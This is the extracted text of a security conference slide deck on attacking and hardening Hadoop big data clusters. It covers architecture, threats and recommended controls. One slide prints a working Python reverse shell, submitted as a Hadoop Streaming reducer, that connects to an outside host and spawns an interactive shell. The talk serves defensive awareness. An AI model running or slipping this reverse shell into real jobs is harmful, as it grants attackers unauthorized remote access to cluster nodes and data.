Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for...

54
www.ernw.de Attacking & Protecting Big Data Environments Birk Kauer & Matthias Luft {bkauer, mluft}@ernw.de 17.03.16

Transcript of Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for...

Page 1: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Attacking & Protecting Big Data Environments

Birk Kauer & Matthias Luft{bkauer, mluft}@ernw.de

17.03.16

Page 2: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

#WhoAreWe¬ Birk Kauer

- Security Researcher @ERNW- Mainly Exploit Developer

¬ Matthias Luft- Security Researcher & Managing Director @ERNW

Research- Mainly managing too much

@lod108@uchi_mata

17.03.16 #2

Page 3: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de17.03.16 #3

Page 4: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Agenda¬ Current State – we need Big Data!¬ Hadoop Overview¬ Attacking Hadoop¬ Protecting Your Data in the Lake¬ Conclusions

17.03.16 #4

Page 5: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Big Data?¬ Buzzword!¬ How does it work?¬ Lets have a closer look at Hadoop

17.03.16 #5

Page 6: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Current State of the Industry ¬ Betsy Burton, Gartner:

“But what’s happening is that big data has quickly moved over the Peak

of Inflated Expectations,” she continues, “…and has become

prevalent in our lives across many hype cycles. So big data has become

a part of many hype cycles.”

17.03.16 #6

Page 7: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Current State of the Industry ¬ “We need a big data cluster in three

months!”- All corporate environments

¬ “Wrapping up, Bodkin noted that many companies are still trying to get their footing on how a data lake can help them.”- http://data-informed.com/data-lakes-

receive-mixed-reception-at-hadoop-summit/

17.03.16 #7

Page 8: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

History¬ Indexing the whole WWW¬ First release 2007¬ Current release 2.6.4¬ Enterprise Distributions:

- Cloudera (CDH 5.5.2)- Hortonworks (HDP 2.3.4)

17.03.16 #8

Page 9: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

FunctionalitySELECT age, AVG(contacts)FROM social.personGROUP BY ageORDER BY age

17.03.16 #9Source: Wikipedia

Page 10: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Functionalityfunction Map is input:

integer K1 between 1 and 1100, representing a batch

of 1 million social.person records for each social.person record in the K1

batchdo

let Y be the person's agelet N be the number of

contacts the person has produce one output record (Y,(N,1))

repeatend function17.03.16 #10Source: Wikipedia

Page 11: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Functionalityfunction Reduce is input:

age (in years) Yfor each input record (Y,(N,C))do

Accumulate in S the sum of N*C Accumulate in Cnew the sum of C

repeatlet A be S/Cnewproduce one output record (Y,(A,Cnew))

end function

17.03.16 #11Source: Wikipedia

Page 12: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Use Cases¬ Artificial intelligence

- Upcoming flaws- Analysis of behavior

¬ Displaying Data in real-time¬ Analyzing People

- Facebook- Insurance

17.03.16 #12

Page 13: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Hadoop Ecosystem

17.03.16 #13

Page 14: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Ambari

17.03.16 #14

Page 15: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

MapReduceDoing the Job

17.03.16 #15

Page 16: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

YarnRessourceManager

17.03.16 #16

Page 17: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

HueShell as a Job? ... cool

17.03.16 #17

Page 18: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Ranger

17.03.16 #18

Page 19: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Definitions¬ Default Cluster (No Security)¬ Secure Cluster (Full Security)

17.03.16 #19

Page 20: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

HDFS (Hadoop Distributed File System)

17.03.16 #20

Page 21: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Structure & Data Movement

Data

Request

17.03.16 #21

Page 22: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

File SystemOn a single Node

17.03.16 #22

Page 23: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Hadoop speaks¬ RPC over TCP

- e.g. heartbeat, resource monitoring¬ HTTP

- e.g. Managing Jobs via web services- e.g. Web applications

17.03.16 #23

Page 24: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

RPC

17.03.16 #24

Page 25: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Netstat Cluster

17.03.16 #25

Page 26: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

JobsJava

JobJar

MapperReducer

Container

17.03.16 #26

Page 27: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

“Container“

17.03.16 #27

Page 28: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

How Jobs lookMapper

17.03.16 #28

public static class TokenizerMapperextends Mapper<Object, Text, Text, IntWritable>{

private final static IntWritable one = newIntWritable(1);

private Text word = new Text();

public void map(Object key, Text value, Contextcontext

) throws IOException, InterruptedException {StringTokenizer itr = new

StringTokenizer(value.toString());while (itr.hasMoreTokens()) {word.set(itr.nextToken());context.write(word, one);

}}

}

Page 29: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

CEaaS (Code-Execution as a Service)Reducer

17.03.16 #29

public static class IntSumReducerextends

Reducer<Text,IntWritable,Text,IntWritable> {private IntWritable result = new

IntWritable();

public void reduce(Text ey, Iterable<IntWritable> values,

Context context) throws IOException,

InterruptedException {int sum = 0;for (IntWritable val : values) {sum += val.get();

}result.set(sum);context.write(key, result);

}}

Page 30: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Wait... Code Execution as a Service?

17.03.16 #30

Page 31: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Relevant Threats ¬ Unauthorized access to cluster data- … via job breakout.- ... via remote compromise.- ... via eavesdropping.

¬ Resource abuse- Password Cracker- Bitcoin Mining

¬ DoS of the Cluster- DDoS the Master Server or Namenodes- Slowing down the Cluster via spamming

files

17.03.16 #31

Page 32: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

ShellCommandExecutor

17.03.16 #32

Page 33: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Attacking Hadoop¬ Easy -> Code Execution by Design¬ But Java Reverse Shell Container

gets killed when allocated Socket is waiting.

¬ => Hadoop Streaming Library

17.03.16 #33

Page 34: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Getting Stable Shellmapper.py

17.03.16 #34

Page 35: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Getting Stable Shellreducer.py

17.03.16 #35

#!/usr/bin/env pythonimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.62.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Page 36: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Don´t DDoS yourself

17.03.16 #36

Page 37: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Demo

17.03.16 #37

Page 38: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Securing Hadoop¬ How do you secure an application

environment designed to execute code?

“WithGreatPowerComesGreatResponsibility”However,somewhatattributedtoVoltaire

17.03.16 #38

Page 39: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Recommended Controls¬ Secure Mode/Hadoop Security¬ Encryption of Network Traffic¬ Network Isolation¬ Monitoring¬ Node Hardening¬ Secure Job Development¬ Security Assessment¬ Patch and Vulnerability Management

17.03.16 #39

Page 40: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Recommended Controls¬ Secure Mode/Hadoop Security¬ Encryption of Network Traffic¬ Network Isolation¬ Monitoring¬ Node Hardening¬ Secure Job Development¬ Security Assessment¬ Patch and Vulnerability Management

17.03.16 #40

Page 41: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Secure Mode

17.03.16 #41

Page 42: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Secure Mode¬ Enables authentication, transport

encryption and least privilege.¬ Every user/job gets an individual

user ID assigned.¬ Relies heavily on Kerberos.

17.03.16 #42

Page 43: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Encryption of Network Traffic

¬ The following network communication methods exist in Hadoop environments:- Hadoop web interfaces/services- Hadoop RPC- Non-Hadoop web interfaces/services

¬ Encryption is possible for all of them.

17.03.16 #43

Page 44: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Monitoring¬ Jobs with the following

characteristics might be relevant:- Extensive network activity- Non-HDFS file system access- Run time & load

¬ Identified problems:- Limited log verbosity- Unclear breakout characteristics

17.03.16 #44

Page 45: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Demo

17.03.16 #45

Page 46: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Node Hardening ¬ Ensure keytab security¬ Follow your OS hardening guides¬ Points for discussion:

- Kernel Hardening (GrSecurity/SELinux)- Removing Compilers

17.03.16 #46

Page 47: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Isolation ¬ Virtualization?- According to Hadoop Ops people, horrible

for performance¬ Linux Containers (e.g. LXC)?

- Supported by Hadoop job schedulers, but only without secure mode (see next slide)

¬ Network Isolation- Only expose gateway nodes to the public- Security benefit when you can execute

code “on the inside”?

17.03.16 #47

Page 48: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Secure Job Development¬ A Hadoop job is also an application.¬ Do you know whether the input

data is trusted?¬ => Secure Job Development

guidelines are needed.

17.03.16 #48

Page 49: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Work in Progress¬ Detect breakouts/anomalies via log

monitoring¬ Long-term PAX experience as for

stability¬ Writing more malicious code to

spread awareness

17.03.16 #49

Page 50: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Conclusion ¬ Hadoop can be run in a (sufficiently) secure way.- … if the controls/hardening mentioned

are implemented¬ Code execution is always risky

- … and cannot be completely contained.¬ Be aware what input data you are

crunching.¬ Everyone needs to understand the

impact of intrinsic code execution.

17.03.16 #50

Page 51: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

There’s never enough time…

THANKYOU… ...foryours!

@lod108@uchi_mata

Code & Slides:https://www.insinuator.net(..soon)

[email protected]@ernw.de

17.03.16 #51

Page 52: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

Questions

17.03.16 #52

Page 53: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

www.TROOPERS.de

17.03.16 #53

Page 54: Attacking Big Data Environments v1.00 ml · -According to Hadoop Ops people, horrible for performance ¬ Linux Containers (e.g. LXC)?-Supported by Hadoop job schedulers, but only

www.ernw.de

DisclaimerAll products, company names, brand names, trademarks and logos are the property of their respective owners!